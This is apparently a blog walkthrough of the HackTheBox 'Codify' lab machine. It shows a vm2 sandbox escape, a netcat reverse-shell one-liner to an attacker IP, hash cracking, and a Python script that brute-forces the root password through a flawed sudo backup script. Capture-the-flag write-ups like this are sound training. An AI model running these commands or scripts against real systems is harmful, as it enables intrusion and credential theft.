HackTheBox | Codify Walkthrough

Hi Folks!

Hope you are doing well.

let’s get started with enumeration.

Enumeration

Nmap Scan

nmap -T4 -v -p- -sCV <target_ip>

nmap scan

We got two open ports: port 22 running a SSH, port 80 running HTTP.

The nmap disclose domain name. so let’s add it to the hosts file.

echo "<target_ip>  codify.htb" >> /etc/hosts

Web Enumeration

web interface

Doing manual enumeration, we got /editor page, we can run node js code in sandbox environment.

/editor page

After trying to bypassing sandbox to get RCE or to read system files, I found it has some limitations on /limitations page.

/limitations page

Here, I couldn’t bypass the sandbox envirnoment. So I returned back to navigate through the pages.

I got an interesting finding on /about page.

/about page

It says it is using the vm2 library to run Javascript code in a sandbox environment.

Here, I googled it, and I found an exploitation to bypass the sandbox and get RCE on the system.

OffSec's Exploit Database Archive

Sandbox Bypass CVE-2023–30547, which allows an attacker to bypass sandbox limitations and execute arbitrary code in the host environment.

Imodified the POC to get the ID of the user to test it.

Testing the POC

Let’s modify the POC to get a shell!!

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc <attacker_ip> <port> >/tmp/f

Shell on the system

Lateral Movement

Enumeration

After doing basic manual enumeration on the box, I found nothing.

I decided to check the web home directory /var/www and I found a database file in /var/www/contacts/ directory.

Joshua hash

We got a hash from the database file, let’s crack it.

cracking the hash

SSH Login

We got the password for Joshua, let’s try to SSH using this credentials.

ssh login

Privilege Escalation

By running sudo -l we can execute /opt/scripts/mysql-backup.sh script as root.

sudo -l

Let’s view the script.

sudo -l script

By running the script, the script get the root password to create a backup of the database.

The comparison of the input with root is vulnerable. If we put * as input it will be accepted.

Here, we can create a script to brute force the root password until we got the password, for example: a*, b*, etc..

Here, the used python script to bruteforce the password.

import string
import subprocess

all = list(string.ascii_letters + string.digits)
password = ""
found = False

while not found:
    for character in all:
        command = f"echo '{password}{character}*' | sudo /opt/scripts/mysql-backup.sh"
        output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True).stdout

        if "Password confirmed!" in output:
            password += character
            print(password)
            break
    else:
        found = True

After running the script, we got the root password.

root

Conclusion

This was great fun!

I hope you enjoyed the walkthrough. I waiting for your feedbacks.

Don’t forget to check other walkthroughs.